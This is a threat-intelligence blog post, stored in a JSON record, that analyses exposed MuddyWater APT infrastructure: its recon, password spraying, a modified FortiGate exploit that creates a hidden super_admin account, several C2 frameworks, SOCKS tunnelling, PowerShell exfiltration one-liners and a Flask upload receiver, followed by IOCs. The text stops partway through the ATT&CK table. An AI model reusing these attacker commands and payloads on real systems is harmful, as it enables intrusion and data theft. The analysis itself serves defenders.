{ "id": "c263467f-c4c1-46b8-852c-fc909ac90f0f", "created_at": "2026-04-06T00:13:13.620466Z", "updated_at": "2026-04-10T03:34:22.65587Z", "deleted_at": null, "sha1_hash": "580f97ddec2872f618306b86bddd4896bd56fe2f", "title": "MuddyWater Exposed: Inside an Iranian APT operation", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 817945, "plain_text": "MuddyWater Exposed: Inside an Iranian APT operation\r\nBy Ctrl-Alt-Intel\r\nPublished: 2026-03-04 · Archived: 2026-04-05 20:48:43 UTC\r\nOverviewPermalink\r\nCtrl-Alt-Intel researchers went hunting for exposed Iranian APT infrastructure.\r\nWe identified and dumped C2 tooling, scripts, logs, victim data, and other operational artefacts from a VPS hosted\r\nin the Netherlands. Ctrl-Alt-Intel assesses with high-confidence this server is operated by MuddyWater (also\r\ntracked as Static Kitten, Mango Sandstorm, Earth Vetala, Seedworm, TA450), a cyber espionage group attributed\r\nas a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS).\r\nRepeated operational security failures by the operators allowed our researchers to pivot using Hunt.io to identify\r\nadditional infrastructure that we also attribute to MuddyWater.\r\nThis blog details the reconnaissance, initial access, command and control, and post-exploitation tradecraft\r\nobserved - including 3+ developed C2s, a Tsundere Botnet using Ethereum smart contracts, and the targeting of\r\norganisations across Israel, Jordan, Egypt, the UAE, Portugal, and the United States.\r\nCtrl-Alt-Intel is not politically affiliated and does not conduct research in support of any government,\r\nideology, or political agenda. The findings presented here are the result of independent threat\r\nintelligence research and are shared openly with the security community to help defenders identify,\r\ndetect, and mitigate threats\r\nReconPermalink\r\nMuddyWater was observed leveraging Shodan and Nuclei to identify potential vulnerable targets. Additionally,\r\nsubfinder and ffuf were leveraged to perform enumeration of target web applications:\r\nSubfinder / ffufPermalink\r\nsubfinder -d clearview.ai -o out-clearview..txt\r\nsubfinder -d jewishagency[.]org -all\r\nsubfinder -d salampalestine[.]org -all\r\nsubfinder -d nbn.org[.]il -all\r\nsubfinder -d yahelisrael[.]com -all\r\nsubfinder -d terrogence[.]com -all\r\nffuf -u https://www.zivorex.com/FUZZ -w directory-list-lowercase-2.3-medium.txt -e .json,.txt,.zip,.rar\r\nClearview AI - US facial recognition software\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 1 of 22\n\nJewish Agency - Global Jewish community programs (nonprofit/NGO).\r\nSalam Palestine - Volunteer, internship, Arabic-learning, and community/cultural programs in Palestine.\r\nNefesh B’Nefesh (nbn.org[.]il) - Nonprofit / immigration (Aliyah) facilitation \u0026 integration services.\r\nYahel Israel - Volunteer/service-learning programs and community partnership programs in Israel.\r\nTerrogence - Israeli-owned private intelligence-as-a-service firm\r\nZivorex - UAE based online platform for selling Gold/Silver\r\nCustom Subdomain Reconnaissance PipelinePermalink\r\nMuddyWater also operates a significantly more mature reconnaissance pipeline using the script just-sub-v5.py .\r\nThe automated recon chains three subdomain enumeration tools together:\r\n1. Sudomy (run via Docker)\r\n2. Subfinder\r\n3. OneForAll\r\nResults are merged, deduplicated, and validated with dnsx to confirm live DNS resolution. The tool supports a\r\ntwo-layer approach: first enumerate subdomains of the target, then enumerate subdomains of those subdomains,\r\neffectively performing recursive subdomain discovery.\r\nShodan CLIPermalink\r\nThe threat actor used the command shodan init to authenticate with the API key, before running shodan\r\ndownload with two queries:\r\nshodan download --limit -1 --fields ip_str,port ivanti-1 \"title:'Ivanti User Portal: Sign In'\"\r\nshodan download --limit -1 --fields ip_str,port ivanti-2 'http.favicon.hash:1983356674'\r\nBoth of these queries were used to identify Ivanti devices on the internet. MuddyWater additionally scanned using\r\nNuclei to identify targets vulnerable to Ivanti CVE-2026-1281:\r\nNucleiPermalink\r\nnuclei -l outputIPandport1983356674.txt -t nuclei-templates/http/cves/2026/CVE-2026-1281.yaml -o epmmoutput_fo_\r\nnuclei -l outputIPandport362091310.txt -t nuclei-templates/http/cves/2026/CVE-2026-1281.yaml -o epmmoutput_362_f\r\nInitial AccessPermalink\r\nKnown vulnerabilitiesPermalink\r\nMuddyWater attempted to scan and/or exploit the below CVEs:\r\nCVE-2026-1731 - BeyondTrust RCE\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 2 of 22\n\nCVE-2026-1281 - Ivanti Endpoint Manager Mobile (EPMM) code injection\r\nCVE-2025-68613 - n8n expression authenticated RCE\r\nCVE-2025-55182 - React2Shell\r\nCVE-2025-52691 - SmarterTools SmarterMail unrestricted file upload\r\nCVE-2025-54068 - Laravel Livewire RCE\r\nCVE-2025-9316 - N-Central improper access control\r\nCVE-2025-5777 - Citrix NetScaler memory leak\r\nCVE-2025-34291 - Langflow chained account takeover + RCE\r\nCVE-2024-55591 - Fortinet FortiOS authentication bypass\r\nCVE-2024-23113 - Fortinet FortiOS RCE\r\nCVE-2022-42475 - Fortinet FortiOS RCE\r\nNovel vulnerabilitiesPermalink\r\nMuddyWater identified and exploited novel SQL injection vulnerabilities in two websites:\r\nBaSalam - A popular Iranian online/social marketplace\r\nA Postgres development platform\r\nInterestingly, the compromise of an Iranian marketplace by MuddyWater is a stark reminder that the Iranian\r\nregime is willing to attack its own businesses and people.\r\nAdditionally, MuddyWater has targeted a subdomain of a company that runs a “Postgres development platform”.\r\nBased on the results of their dump, no significant data was taken.\r\nBruteforce / SprayingPermalink\r\nAside from exploiting vulnerabilities, MuddyWater has attempted to password spray Outlook Web Access (OWA)\r\n\u0026 SMTP services.\r\npython owa.py -u users.txt -p morepasswd.txt -f url.txt -m bf -t 10 # Linked to https://webmail.gov.jo\r\npython owa.py -f mail.[REDACTED] -u owausernames.txt -p pass.txt -o out.txt -m bf -t 1\r\npython3 owa.py --url https://gohost.co[.]il/owa/auth/logon.aspx --username user.txt --password pass.txt --thread\r\npython3 owa.py --url https://84.110.105[.]214 --username users.txt --password pass.txt --threads 30 --output suc\r\n #https://mail.bethadar.com\r\npython3 owa.py --url https://mail.terem[.]com --username user.txt --password pass.txt --threads 5 --output succe\r\nJordan Government Webmail\r\nUAE based: provider of marine dredging, energy EPC (Engineering, Procurement, and Construction)\r\nHost \u0026 Found (gohost.co[.]il): Israeli Managed IT / hosting provider\r\nBet Hadar: Israeli Medical rehabilitation and nursing center\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 3 of 22\n\nTerem: Israeli urgent-care / walk-in medical clinic network\r\nFurthermore, we also saw the tool patator used in an attempt to brute-force SMTP:\r\npatator smtp_login host=mail.REDACTED[.]com port=587 starttls=1 user=FILE0 password=FILE1 0=admins.txt 1=pass.t\r\npatator smtp_login host=mail.REDACTED[.]com port=587 starttls=1 user=FILE0 password=FILE1 0=admins.txt 1=pass.tx\r\nFortigate ExploitationPermalink\r\nWe observed the threat actor target multiple Fortinet related CVEs (CVE-2024-55591, CVE-2024-23113 \u0026 CVE-2022-42475) in attempts to gain command execution on Edge devices.\r\nWe observed the threat actor had modified the watchTowr CVE-2024-5559 POC that would allow for RCE.\r\nThe original watchTowr PoC sends an operator-supplied command (for example, get system status )\r\nafter forging the WebSocket login context. In the modified sample, this was replaced with hardcoded\r\nFortiOS CLI configuration payloads ( test1 – test13 ) focused on account creation, privilege\r\nescalation and persistence\r\nMultiple embedded payloads attempt to create or modify local users and VPN groups (for example\r\nFortiWiFi , darlen , offices , and VPN-Users / ssl-vpn-groupamoss ). Other commands ( show ,\r\nlist , ? ) suggest hands-on testing of FortiOS CLI syntax during operations.\r\nThe payload actively executed in the sample ( test11 ) attempts to create a new FortiGate administrator\r\naccount, FortiSetup , with the super_admin profile and root VDOM. The password is supplied as a\r\nFortiOS ENC value rather than plaintext, consistent with an attempt to establish persistence:\r\nconfig system admin\r\n edit \"FortiSetup\"\r\n set accprofile \"super_admin\"\r\n set vdom \"root\"\r\n set password ENC SH2x6nU4ztieZPUfFQpYaZY99xC3x4+7RFlL7+pkVYA/sW6Dd53lNOCATA3vbs=\r\n next\r\nend\r\nThe forged login context was also modified to include a different public IP ( 194.11.246[.]101:1338 )\r\ninstead of the public PoC placeholder, providing an additional operational artefact.\r\n# Original\r\nlogin_message = f'\"{args.user}\" \"admin\" \"watchTowr\" \"super_admin\" \"watchTowr\" \"watchTowr\" [13.37.13.37]:1337 [13\r\n# MuddyWater version:\r\nlogin_message = f'\"{args.user}\" \"admin\" \"watchTowr\" \"super_admin\" \"watchTowr\" \"watchTowr\" [194.11.246.101]:1338\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 4 of 22\n\nI don’t believe the provided IP address has an impact on exploitation, however MuddyWater still modified the\r\nscript to change the IP address to 194.11.246[.]101 . Notably, this IP address is known MuddyWater\r\ninfrastructure, previously reported by the security vendor ESET on a December 2025 analysis - MuddyWater:\r\nSnakes by the riverbank. In ESET’s blog, this IP address was noted as a “MuddyWater C\u0026C server” - with no\r\nmention of Fortinet exploitation.\r\nCtrl-Alt-Intel identified one victim associated with this attack, an Israeli distributor of scientific equipment and\r\nquality control instruments.\r\nN-Central exploitationPermalink\r\nMuddyWater also performed mass-exploitation of CVE-2025-9316, a vulnerability in SolarWinds N-central, a\r\nwidely deployed RMM (Remote Monitoring \u0026 Management) platform used by MSPs. This could allow\r\nMuddyWater to generate sessionIDs for unauthenticated users:\r\nCVE-2025-9316 exploitation\r\nCommand \u0026 ControlPermalink\r\nCtrl-Alt-Intel managed to retrieve multiple C2 server binaries, alongside some corresponding clients, that were\r\nused by MuddyWater.\r\nSome of the C2 components had previously been discussed by Group-IB in their analysis: Operation Olalampo:\r\nInside MuddyWater’s Latest Campaign.\r\nOn the MuddyWater server identified by Ctrl-Alt-Intel, a subdirectory ( /rdp/c2 rdp ) contained three files:\r\nclient.exe - C2 client\r\nserver - C2 server binary\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 5 of 22\n\nserver.txt - Credentials \u0026 IP address of C2 server\r\nNotably, within server.txt the IP address 162.0.230[.]185 was exposed:\r\nMuddyWater C2 server\r\nThis IP was included within the Group-IB reporting, alongside a splash page displaying “We’ll Be Back Soon” on\r\na MuddyWater-linked IP address ( 209.74.87[.]67 ) and on the separate domain netvigil[.]org .\r\nWe observed this identical HTML page served within the exposed infrasture we observed:\r\nMuddyWater HTML splash page\r\nC2 server binaries have been uploaded to our Github.\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 6 of 22\n\nAlthough an analysis of all the server-side C2 binaries is not in the scope of this blog, we did run these ourselves\r\nto take a look how the operators would control victim machines:\r\nMuddyWater C2 server\r\nKeyC2Permalink\r\nMuddyWater used a Python-based C2 server over UDP, named Key C2. This allows operators to remotely control\r\ncompromised Windows machines over a custom binary protocol on port 1269 from a singular Python script.\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 7 of 22\n\nKeyC2 Python source\r\nWhen a client first beacons in, it transmits system information including the computer name, domain, Windows\r\nversion, and username. The server parses this, assigns the client a numeric ID, and stores it in a local SQLite\r\ndatabase. Clients then periodically check in, allowing the operator to see which machines are online.\r\nOnce an operator selects a client, Key C2 supports the following capabilities:\r\nRemote command execution - two modes ( cmd and cmdexec ) for executing commands on the victim and\r\nstreaming output back\r\nFile download - pull files from the compromised machine to the C2 server\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 8 of 22\n\nFile upload - push files from the C2 server to the victim\r\nC2 server migration - instruct a client to redirect its beaconing to a different IP address, allowing the\r\noperator to move infrastructure without losing access\r\nCtrl-Alt-Intel observed emojis in the response of output, indicative of AI-assisted development. The source has\r\nbeen uploaded to our Github.\r\nPersianC2Permalink\r\nCtrl-Alt-Intel identified an additional more mature C2 server used by MuddyWater which has been coined\r\nPersianC2, named after Persian/Farsi strings that were found in the source:\r\nPersian strings\r\nUnlike Key C2’s custom UDP protocol and CLI interface, PersianC2 used standard HTTP polling. Implants\r\nbeacon into the server on a configurable sleep interval, picking up queued commands via JSON API endpoints.\r\nThe operator dashboard supports:\r\nRemote command execution - commands are queued and picked up on the next heartbeat, with output\r\nstreamed back to the dashboard in real-time\r\nFile upload - push files from the C2 to victims, with live progress tracking and cancel support\r\nSleep configuration - adjust the implant’s beacon interval per-client\r\nStaging - a built-in mechanism that takes a template binary (calc.exe), appends a SHA-256 hash derived\r\nfrom the victim’s username and computer name, and drops the payload to the victim\r\nClient removal - queue an exit!! command that triggers the implant to self-terminate and deletes the\r\ndatabase record\r\nThe PersianC2 source code has been uploaded to our Github.\r\nC2 loggingPermalink\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 9 of 22\n\nIn the PersianC2 directory we observed the files, client.db , .command_history , alongside directories\r\nuploads \u0026 downloads .\r\nAlthough only one victim was observed beaconing from a Portuguese IP address, we could see MuddyWater\r\noperators attempting to run commands on the 23rd February:\r\n# 2026-02-23 18:53:26.546078\r\n+upload db.msi dd2.msi\r\n# 2026-02-23 18:56:24.620743\r\n+upload db.msi dd11.msi\r\n# 2026-02-23 19:14:18.041428\r\n+list\r\n# 2026-02-23 19:15:43.499677\r\n+upload cal.exe c22.exe\r\n# 2026-02-23 19:20:00.789845\r\n+cmd ping 8.8.8.8 -n 3\r\nArenaC2Permalink\r\nCtrl-Alt-Intel identified an additional Python-based C2 framework on the MuddyWater server, which we have\r\ncoined ArenaC2.\r\nUnlike Key C2’s custom UDP protocol or PersianC2’s JSON API polling, ArenaC2 operates over HTTP POST\r\nusing a FastAPI/uvicorn web server and encrypts all traffic with AES-256-CBC.\r\nThe C2 server presents a decoy landing page masquerading as “ArenaReport”, a fictitious multilingual news\r\nwebsite, when visited via a browser. This page includes embedded images, animated backgrounds, and content in\r\nEnglish, French, and German - designed to make the C2 domain appear as a legitimate website to casual visitors\r\nor automated scanners.\r\nEndpoint Method Purpose\r\n/ GET Decoy HTML landing page (“ArenaReport”)\r\n/redirect POST Stager - delivers the implant executable to new victims\r\n/sort POST\r\nRegistration - implant checks in with host reconnaissance, receives session ID\r\nand auth token\r\n/deliver POST Tasking - implant polls for queued commands\r\n/deliver/0 POST Connection check result\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 10 of 22\n\nEndpoint Method Purpose\r\n/deliver/1 POST Shell creation result\r\n/deliver/2 POST Command execution acknowledgement\r\n/deliver/3 POST Shell output (streamed back to operator)\r\n/deliver/4 POST Upload initiation acknowledgement\r\n/deliver/5 POST Upload chunk acknowledgement\r\n/deliver/6 POST Secondary payload delivery ( ConsoleApplicationen.exe )\r\nThe file ConsoleApplicationen.exe identified on disk was not an executable, as the name would suggest. Ctrl-Alt-Intel has not analysed this further - but would encourage those who are interested to access this via our\r\nGithub.\r\nProxy / TunnelingPermalink\r\nMuddyWater was observed leveraging the Chinese-developed tool Neo-reGeorg to perform webshell-based\r\nSOCKS pivoting.\r\npython3 neoreg.py -k 123QWEasd -u https://[REDACTED]/aspnet_client/system_web/4_0_30319/nfud.aspx\r\nMuddyWater compromised the Exchange server of a Portuguese immigration government-related domain,\r\nuploading a Neo-reGeorg web-shell to facilitate access to the internal network.\r\nAdditionally, the tool resocks was used to configure SOCKS listeners multiple times:\r\n./resocks listen --on 0.0.0.0:443 ... -p 0.0.0.0:10843\r\nSimilarly, an alternative tool revsocks was also used by the threat actor to gain access to internal victim networks:\r\nwget -O rev https://github.com/kost/revsocks/releases/download/v2.9/revsocks_linux_amd64\r\nchmod a+x rev\r\n./rev\r\n./rev -listen :443 -socks 0.0.0.0:1080 -pass SuperSecretPassword -ws\r\nnc -lvp 443\r\n./rev -listen :443 -socks 0.0.0.0:1080 -pass SuperSecretPassword -ws\r\nTsundere EtherHidingPermalink\r\nWithin the server, we identified that MuddyWater had staged a PowerShell loader, reset.ps1 . The PowerShell\r\nloader will lead to execution of obfuscated Node.js payloads that appear similar to Tsundere Botnet.\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 11 of 22\n\nThe loader downloads the Node.js interpreter to the following file path:\r\n%USERPROFILE%\\AppData\\Local\\Nodejs\\\r\nEmbedded within the PowerShell loader are AES-CBC/PKCS7 encrypted blobs, which are decrypted and written\r\nto disk:\r\n%USERPROFILE%\\AppData\\Local\\Nodejs\\VfZUSQi6oerKau.js\r\n%USERPROFILE%\\AppData\\Local\\Nodejs\\sysuu2etiprun.js\r\nAdditionally, a package.json file is also written to disk, revealing the Node.js packages the payload would\r\nleverage:\r\n{\r\n \"name\": \"system-service\",\r\n \"version\": \"1.0.0\",\r\n \"description\": \"System service setup\",\r\n \"dependencies\": {\r\n \"ws\": \"^8.18.1\",\r\n \"ethers\": \"^6.13.2\"\r\n }\r\n}\r\nThe Node.js script VfZUSQi6oerKau.js is used to establish persistence via the creation of a Run key. This script\r\nwill also trigger execution of the main bot, sysuu2etiprun.js .\r\nThis sample uses Ethereum smart contracts in order to retrieve the C2 servers. By deobfuscating the sample, we\r\nretrieved the following details:\r\nContract - 0x2B77671cfEE4907776a95abbb9681eee598c102E\r\nABI func - getString()\r\nQuery arg - 0x002E9Eb388CBd72bad2e1409306af719D0DB15e4\r\nWe also observed a hardcoded list of Ethereum RPC nodes that would be used to call the getString() function\r\non the smart contract.\r\nBlockchain hosting C2 serversPermalink\r\nUsing Etherscan we can view the contracts event log history, revealing lists of C2 servers:\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 12 of 22\n\nEtherScan Smart Contract History\r\nThis bot communicates over WebSocket to retrieve commands. Two historical IP addresses were observed serving\r\nas WebSocket C2 servers:\r\n185.236.25[.]119\r\n193.17.183[.]126\r\nExfiltrationPermalink\r\nAlthough we observed MuddyWater use multiple custom-developed C2s, many of which had capabilities for\r\nexfiltration, we observed the threat actor leveraging Wasabi S3, put.io, Amazon EC2 and separately a\r\nlightweight Python HTTP file server on the machine.\r\nPython-serverPermalink\r\nA minimal Flask web application ( web.py ) was found serving as a file exfiltration receiver. It runs on port\r\n10443 and accepts file uploads via a POST to /success :\r\n@app.route('/success', methods = ['POST'])\r\ndef success():\r\n if request.method == 'POST':\r\n f = request.files['file']\r\n f.save(f.filename)\r\nA commented-out PowerShell one-liner demonstrates the intended client-side usage:\r\n$wc = New-Object System.Net.WebClient\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 13 of 22\n\n$resp = $wc.UploadFile(\"http://127.0.0.1:5000/success\",\"C:\\Users\\K3vin\\Downloads\\log.txt\")\r\nCtrl-Alt-Intel observed MuddyWater run the below PowerShell commands in attempt to exfiltrate data from victim\r\nmachines:\r\ncd E:\\DATA\\PEACE2\\Personnel_Share\\CreditCards\\Amex\\;foreach ($name in ((ls).Name)){$wc = New-Object System.Net\r\nGet-ChildItem -Path \"C:\\Users\\riyad\\desktop\" -Recurse -File | ForEach-Object {$wc = New-Object System.Net.WebCli\r\nIt appears MuddyWater is also operating an EC2 server used for exfiltration on the IP address 18.223.24[.]218 .\r\nEgyptAirPermalink\r\nThe Python HTTP exfiltration server was primarily used to steal data from EgyptAir or visa/passports for\r\nEgyptian nationals.\r\nThis data included, but was not limited to:\r\nEgyptian passport and visa information\r\nReceipts from “King Khalid Int’l Airport” in Riyadh\r\nLegal documents\r\nFinancial statements\r\nPhotos and videos from WhatsApp\r\nAlthough the files were predominantly related to EgyptAir, the PowerShell command exposing the file path\r\nC:\\Users\\riyad\\desktop , along with the receipt from “King Khalid Int’l Airport,” may suggest that this specific\r\ndata was stolen from an computer associated with EgyptAir located in Riyadh, Saudi Arabia.\r\nMore notably, in the same exfiltration directory, the threat actor had also stolen multiple scripts and binaries\r\nrelated to ZKTeco’s biometric time-and-attendance and physical access control systems.\r\nAlthough this could be coincidental, we noted that the exfiltrated ZKTeco biometric access control software and\r\nconfigurations may align with MuddyWater’s previous targeting of the U.S. company Clearview AI, a facial\r\nrecognition provider.\r\nCloud StoragePermalink\r\nMuddyWater was also observed leveraging both Wasabi S3 and put.io for exfiltrating stolen files. It appears\r\nMuddyWater attempted to backup files from the S3 bucket to put.io using the rclone tool:\r\nrclone config reconnect putio:\r\nrclone lsd putio:\r\nrclone lsd wasbbi:\r\nrclone lsd wasabbi:\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 14 of 22\n\nrclone lsd wasabbi:wasabirclone\r\nrclone copy wasabbi:wasabirclone/ERPBackup putio:/iiitdEDUin\r\nPivoting (with Hunt.io)Permalink\r\nIn the Command \u0026 Control section, Ctrl-Alt-Intel researchers identified a C2 IP address 162.0.230[.]185 that\r\nhad already been linked to MuddyWater by Group-IB.\r\nPivoting on this IP address on the threat intelligence platform Hunt.io we can see they have previously caught\r\nanother associated open-directory:\r\nAdditional MuddyWater open-directories\r\nWithin this open-directory, we observed the payload second.exe :\r\nPivoting on known MuddyWater malware\r\nWe can use the “Search by SHA256” feature to pivot and identify another open-directory on the domain\r\nwww.xt24[.]com :\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 15 of 22\n\nPivoting on known MuddyWater malware\r\nAttribution AssessmentPermalink\r\nCtrl-Alt-Intel assesses with high-confidence that this infrastructure is operated by MuddyWater (also tracked as\r\nStatic Kitten, Mango Sandstorm, TEMP.Zagros, Earth Vetala, Seedworm or TA450), a cyber espionage\r\ngroup attributed as a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS).\r\nThis assessment is based on the convergence of victimology, tooling overlaps with published MuddyWater\r\nresearch, linguistic artefacts, and infrastructure overlaps.\r\nSupporting EvidencePermalink\r\nExpected victimology - Targets span Israeli organisations (healthcare, hosting, immigration, intelligence),\r\nEgyptian airliner, Jordanian government webmail, UAE companies, US entities, and Jewish/Israeli-linked\r\nNGOs - all consistent with known MOIS collection priorities. The compromise of Iranian marketplace\r\nBaSalam further aligns with MOIS’s documented domestic surveillance mandate.\r\nDirect overlap with Group-IB’s Operation Olalampo - In February 2026, Group-IB published research\r\nattributing Operation Olalampo to MuddyWater. We retrieved C2 components, infrastructure, malware and\r\ntools previously discussed in that analysis, and observed an identical “We’ll Be Back Soon” splash page\r\nserved on both our identified infrastructure and MuddyWater-linked IP addresses referenced in their\r\nreporting\r\nInfrastructure overlap with ESET reporting - The IP address 194.11.246[.]101 , embedded within\r\nMuddyWater’s modified Fortinet exploit, was previously identified by ESET in their December 2025\r\nanalysis MuddyWater: Snakes by the riverbank as a MuddyWater C\u0026C server.\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 16 of 22\n\nPersian/Farsi language artefacts - Persian/Farsi strings were identified within .bash_history ,\r\ncommented source code, and the C2 framework we coined PersianC2. This is consistent with the profile\r\nof Iranian operators.\r\nExploitation of edge devices - Exploitation of multiple Fortinet CVEs aligns with a 2021 CISA/FBI joint\r\nadvisory documenting Iranian state-sponsored actors exploiting Fortinet vulnerabilities since at least March\r\n2021. Similarly, this actor targeted Exchange servers and deployed webshells to Portuguese government\r\ninfrastructure, consistent with MuddyWater’s well-documented history of exploiting Microsoft Exchange\r\nfor initial access, as highlighted in the same CISA advisories.\r\nConclusionPermalink\r\nThe exposed infrastructure detailed in this blog provides a broad view into a MuddyWater operation - from initial\r\nreconnaissance through to data exfiltration. What stands out is not the sophistication of any single tool or\r\nmalware, but the breadth of the operation: countless organisations targeted, multiple custom-developed C2\r\nframeworks, exploitation of over a dozen CVEs including novel SQL injection vulnerabilities, password spraying\r\ncampaigns, Ethereum-based C2 resolution, and multiple exfiltration channels spanning cloud storage \u0026 EC2\r\ninstances.\r\nMuddyWater continues to demonstrate a willingness to rapidly adopt public exploit code, modify it for operational\r\nuse, and deploy it at scale - all while developing custom tooling in parallel. The targeting observed here - spanning\r\nIsraeli healthcare and immigration organisations, Jordanian government webmail, an Egyptian national airline,\r\nUAE enterprises, and even an Iranian domestic marketplace - reinforces that MOIS collection priorities remain\r\nbroad, aggressive, and unconstrained by national borders, including their own.\r\nPerhaps most notably, the repeated operational security failures that enabled this research - exposed open-directories, hardcoded credentials, reused infrastructure across campaigns, and server-side source code left\r\naccessible.\r\nCtrl-Alt-Intel will continue to monitor MuddyWater infrastructure and will publish updates as new findings\r\nemerge. Defenders are encouraged to review the IOCs and MITRE ATT\u0026CK mappings provided below.\r\nAcknowledgementsPermalink\r\nFirstly, we would like to thank Security Researcher @ice_wzl_cyber for his collaboration, insight and analysis\r\ninto this MuddyWater campaign.\r\nWhilst writing this blog, Security Researcher @nahamike01 also observed KeyC2 \u0026 Tsundere Botnet activity\r\nlinked to MuddyWater campaigns:\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 17 of 22\n\n@nahamike01 Tweet\r\nHuntressPermalink\r\nOn 06/03/26, Huntress released a blog Clearing the Water: Unmasking an Attack Chain of MuddyWater exposing\r\nthe kill-chain from an Iranian APT intrusion that they contained.\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 18 of 22\n\nHuntress blog\r\nIt was interesting to see the same indicator that inspired this blog, used in the wild. Additionally, further overlaps\r\nin indicators were observed with Group-IB \u0026 Hunt.io. We wanted to acknowledge the work by Jamie Levy \u0026\r\nHarlan Carvey breaking down MuddyWater tradecraft seen in-the-wild.\r\nIOCsPermalink\r\nIndicator Type Context\r\n185.236.25[.]119\r\nIP\r\nAddress\r\nTsundere Bot\r\nWebSocket C2\r\n193.17.183[.]126\r\nIP\r\nAddress\r\nTsundere Bot\r\nWebSocket C2\r\n162.0.230[.]185\r\nIP\r\nAddress\r\nMuddyWater C2 /\r\nOpen Directory\r\n157.20.182[.]49\r\nIP\r\nAddress\r\nOpen Directory\r\n209.74.87[.]100\r\nIP\r\nAddress\r\nOpen Directory\r\n18.223.24[.]218\r\nIP\r\nAddress\r\nExfiltration Server\r\n194.11.246[.]101\r\nIP\r\nAddress\r\nFortigate POC IP\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 19 of 22\n\nIndicator Type Context\r\nwww.xt24[.]com Domain Open Directory\r\nreset.ps1 Filename\r\nTsundere Bot\r\nPowerShell loader\r\n0x2B77671cfEE4907776a95abbb9681eee598c102E Address\r\nSmart Contract\r\nAddress\r\n7ab597ff0b1a5e6916cad1662b49f58231867a1d4fa91a4edf7ecb73c3ec7fe6\r\nSHA-256\r\nreset.ps1 -\r\nTsundere Bot\r\nPowerShell loader\r\nVfZUSQi6oerKau.js Filename\r\nTsundere Bot\r\npersistence /\r\nlauncher script\r\nc8589ca999526f247db4d3902ade8a85619f8f82338c6230d1b935f413ddcb3d\r\nSHA-256\r\nVfZUSQi6oerKau.js\r\nsysuu2etiprun.js Filename\r\nTsundere Bot main\r\npayload\r\nbedb882c6e2cf896e14ecf12c90aaa6638f780017d1b8687a40b4a81956e230f\r\nSHA-256\r\nsysuu2etiprun.js\r\nMITRE ATT\u0026CKPermalink\r\nTactic ID Technique Observation\r\nReconnaissance T1595.002\r\nActive Scanning:\r\nVulnerability Scanning\r\nNuclei used to mass-scan for CVEs\r\nReconnaissance T1590.002\r\nGather Victim Network\r\nInformation: DNS\r\nsubfinder used for subdomain\r\nenumeration of target organisations\r\nReconnaissance T1595.003\r\nActive Scanning: Wordlist\r\nScanning\r\nffuf directory brute-forcing against\r\ntarget web applications\r\nResource\r\nDevelopment\r\nT1583.003\r\nAcquire Infrastructure:\r\nVirtual Private Server\r\nMultiple VPS used to host C2 tooling and\r\noperational scripts\r\nResource\r\nDevelopment\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nCustom C2 frameworks developed: Key\r\nC2 (UDP) and PersianC2 (HTTP)\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 20 of 22\n\nTactic ID Technique Observation\r\nResource\r\nDevelopment\r\nT1588.005\r\nObtain Capabilities:\r\nExploits\r\nPublic exploit code and Nuclei templates\r\nfor multiple CVEs\r\nResource\r\nDevelopment\r\nT1588.002 Obtain Capabilities: Tool\r\nOpen-source tools: Neo-reGeorg, resocks,\r\nrevsocks, patator\r\nInitial Access T1190\r\nExploit Public-Facing\r\nApplication\r\nExploitation of Fortinet, Ivanti,\r\nExchange, BeyondTrust, and novel SQLi\r\nInitial Access T1110.003\r\nBrute Force: Password\r\nSpraying\r\nOWA password spraying against Israeli,\r\nJordanian, and UAE targets\r\nInitial Access T1110.001\r\nBrute Force: Password\r\nGuessing\r\npatator SMTP brute-force against mail\r\nservers\r\nDiscovery T1082\r\nSystem Information\r\nDiscovery\r\nArenaC2, KeyC2, and PersianC2 all\r\ncollect OS version, architecture, VM\r\nstatus, and domain membership at check-in\r\nExecution T1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nreset.ps1 - Tsundere Bot PowerShell\r\nloader decrypts and stages Node.js\r\npayloads\r\nExecution T1059.007\r\nCommand and Scripting\r\nInterpreter: JavaScript\r\nObfuscated Node.js payloads\r\n( VfZUSQi6oerKau.js ,\r\nsysuu2etiprun.js )\r\nExecution T1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nKey C2 cmd and cmdexec modes for\r\nremote command execution\r\nPersistence T1547.001\r\nBoot or Logon Autostart\r\nExecution: Registry Run\r\nKeys\r\nVfZUSQi6oerKau.js creates a Run key\r\nfor persistence\r\nPersistence T1505.003\r\nServer Software\r\nComponent: Web Shell\r\nNeo-reGeorg ASPX webshell\r\n( nfud.aspx ) deployed on compromised\r\nExchange server\r\nPersistence T1136.001\r\nCreate Account: Local\r\nAccount\r\nFortiGate exploitation creates\r\nFortiSetup admin account with\r\nsuper_admin profile\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 21 of 22\n\nTactic ID Technique Observation\r\nDefense Evasion 